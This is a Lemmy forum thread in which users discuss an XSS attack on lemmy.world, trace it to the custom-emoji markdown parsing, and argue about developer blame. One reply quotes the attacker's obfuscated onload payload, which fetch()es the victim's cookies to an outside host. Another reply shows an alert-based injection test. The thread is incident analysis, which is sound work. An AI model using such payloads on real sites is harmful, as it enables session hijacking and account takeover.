lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar.

It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

EDIT: as a demo, your web browser is probably telling you that it’s blocked a popup or something, you should see an alert I’ve injected

  • Muddybulldog@mylemmy.winEnglish
    10·
    1 年前

    Not sure if it’s actually XSS. Lemmy.world did have an admin account compromise so it could’ve been done locally.

    It actually looks like it may be being propagated via comments. I received more than a handful from lemmy.world and it appears they were in the process of deleting them before they went dark. I nuked the remaining ones by hand but you can see that lemmy.blahaj.zone still has the same few remaining… https://lemmy.blahaj.zone/search?q=onload%3D&type=All&listingType=All&page=1&sort=TopAll

      • Muddybulldog@mylemmy.winEnglish
        2·
        1 年前

        The actually full comment code that I can see in the database is quite disquieting, cookie stealing:

        onload="fetch(String.fromCharCode(104,116,116,112,115, 58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47) +btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))

      • cpp@sh.itjust.worksEnglish
        44·
        1 年前

        This seems like a really basic vulnerability that whoever wrote the code to do that probably should have been aware of. It concerns be about the security of the rest of Lemmy if they’re making such basic errors.

        • sudneo@lemmy.worldEnglish
          52·
          1 年前

          Blaming culture does not help with vulnerability disclosure. Vulnerabilities do happen and will happen again.

          Writing a parser is not trivial and remember that it was a tiny project until a month ago.

          • pfannkuchen_gesicht@lemmy.oneEnglish
            4·
            1 年前

            Trying to blame is indeed of little help here right now. But it also worries me that such a basic vulnerability exists in the first place. It’s like the #1 rule to not trust user-input. I hope this is the only such trivial one and we won’t wake up to someone exploiting an SQL injection next.

            • sudneo@lemmy.worldEnglish
              2·
              1 年前

              Honestly it was not trivial, the custom emojis in the markdown parser seems to be vulnerable. Of course everything should be sanitized, but in practice there are cases where it’s hard to make a proper sanitization while retaining features to let users write weird stuff. This is not the case of “validate a username” that you know very well which regex to use and which character space.

              I would actually say that this vulnerability should have been prevented using proper cookie security, which should make it impossible to steal the session via XSS.

              I do acknowledge though that it’s not easy to take care of all of this when it’s 2 people working on everything (from design to frontend, passing for deployment etc.), especially if there are no specific competencies in appsec.

    • OreganoChampion@sh.itjust.worksEnglish
      1·
      1 年前

      I posted this before… But as a Mod for the Mildly Infuriating And Lemmy Shitposting community; 1 hour before the attack happened I received the following message from the admin that was compromised:

      A long with that, yeah I saw that message from a member reposting an image with what appeared to code inside it.

      I can’t get on Lemmy.World to take a screenshot but I wasn’t sure what it was I just removed the comment, but it definitely looked like code injection.

        • Cyclohexane@lemmy.mlEnglish
          2·
          1 年前

          Mistakes happen. This is one of the most common vulnerabilities in the software world. Again, it’s easy to say it’s insane when you aren’t the one making it. I don’t see you making anything half as good and without mistakes.

          Constructive criticism is okay, but this isn’t it. Sounds very entitled.

        • Cyclohexane@lemmy.mlEnglish
          42·
          1 年前

          It’s convenient to completely discredit a large piece of software taking years to develop as “insane” because they made a mistake (one of the most common security mistakes in the software world) when you don’t recognize the difficulty and wouldn’t be able to make something 10% as big.

          And frankly it sounds silly.

          • crystal@feddit.deEnglish
            11·
            1 年前

            The reason it’s perceived that way is because code injection in user input, is (one of) the most obvious, well-known, and easiest attacks to do, while at the same time being super easy to prevent.

            • Cyclohexane@lemmy.mlEnglish
              2·
              1 年前

              It is one of the most well known, but it also is easy to miss, evidently from how often it happens despite it being very well known.

              It’s very easy to fix once it’s known, but it is easy to go unnoticed.

              Unless you somehow think that most app developers are incompetent, in which case I ask again: show me your better version.

              • crystal@feddit.deEnglish
                1·
                1 年前

                I can confidently say that in not a single company project I did frontend development for did I ever leave user input unsanitized.

                But I did not ever create a Lemmy like project, that is true.

        • oce 🐆@jlai.luEnglish
          2·
          1 年前

          The pilot crashed on the field because the helicopter was misfunctioning, and it risked falling on a primary school.

    • Snipe_AT@lemmy.atay.devEnglish
      115·
      1 年前

      what about the time you wrote your “hello world” code? did you sanitize your user input then?

  • Max-P@lemmy.max-p.meEnglish
    2·
    1 年前

    Something’s weird about it because I tried copy pasting it into my instance’s sidebar and nothing happened. It gets quoted properly, at least on the official 0.18.1 Docker.

    The rendered HTML looks like this:

    <img src="https://lemmy.max-p.me/pictrs/image/d3667ced-4ea5-4fbf-b229-461c68192570.jpeg" alt="&quot; onload=&quot;setTimeout(()=003E{alert('oh no')},3000)&quot;" title="lw"></p>

    E: Found it! Requires emojis as per this PR

    If your instance doesn’t have any custom emojis, you’re safe. If not, log out immediately and wait for the instance to be updated. Anyone can exploit this as long as long as there’s any custom emojis defined.

    • Oraksus@programming.devEnglish
      1·
      1 年前

      Just a guess I haven’t looked at the code. There is probably front end validation, but not back end validation, so forming your own http call probably allows any input.

    • AlmightySnoo II 🐢@sh.itjust.worksOPEnglish
      0·
      1 年前

      Have you tried sending the API request for the sidebar edit yourself? Maybe the escaping is only done at the UI level (which would be EXTREMELY bad).

      EDIT: no, couldn’t find anything via comments

      • Max-P@lemmy.max-p.meEnglish
        0·
        1 年前

        I’ve even checked in the database directly - the markdown exploit is pasted exactly as is from the JSON I shared here (passed through jq to strip the JSON-encoding), with the only difference being I replaced lemonparty with example.com.

        It renders, I get the image, but it’s escaped properly. Both the affected instances so far are running some RC / version number shows a git commit, so maybe there’s something weird about the build config that results in slightly different parsing.

        I’ve very puzzled about it. I tried it in sidebar, I tried it as taglines (where lemmy.world’s exploit was), I tried it as a post, I tried it as a comment. All of them result in the same correct output. I’ve even added the trailing space at the end in case it matters.

        I’m open if you have more ideas.

        E: database:

              • Max-P@lemmy.max-p.meEnglish
                1·
                1 年前

                I tried taglines.

                Looks like the key was custom emojis: https://github.com/LemmyNet/lemmy-ui/pull/1897/files

                That probably explains the "lm" bit after, makes the parser do something which results in the code not being properly escaped and boom.

                I’m guessing now that the exploit has to be tweaked for individual instances to trigger this, to target an emoji the instance has which makes the check go into that branch. I don’t have any on mine so I couldn’t possibly trigger the bug.

                I’ll try to play with that and see if I can trigger it with that extra knowledge.

                • AlmightySnoo II 🐢@sh.itjust.worksOPEnglish
                  0·
                  1 年前

                  You’re right but then that means only a compromised admin account can do that (and that is the case on lemmy.world with Michelle’s account). The thing is it happened on other instances too, so I’m very inclined to think that there’s also something going on with comments or community sidebars.

  • ugh@lemm.eeEnglish
    1·
    1 年前

    Can someone ELI5 what this means? Do users need to be vigilant? Is information or malware being passed around? What can we expect going forward?

    • 𝙚𝙧𝙧𝙚@feddit.winEnglish
      1·
      1 年前

      The sophistication is impressive, using emojis. Are people getting paid to find the vulnerabilities or are they just bored??

  • gthutbwdy@lemmy.sdf.orgEnglish
    01·
    1 年前

    I don’t know too much about lemmy yet, but all of these things (tagline,siudebar and legal info) sound like they should be controlled only by admins, that should be able to add html code anyway (since it their website).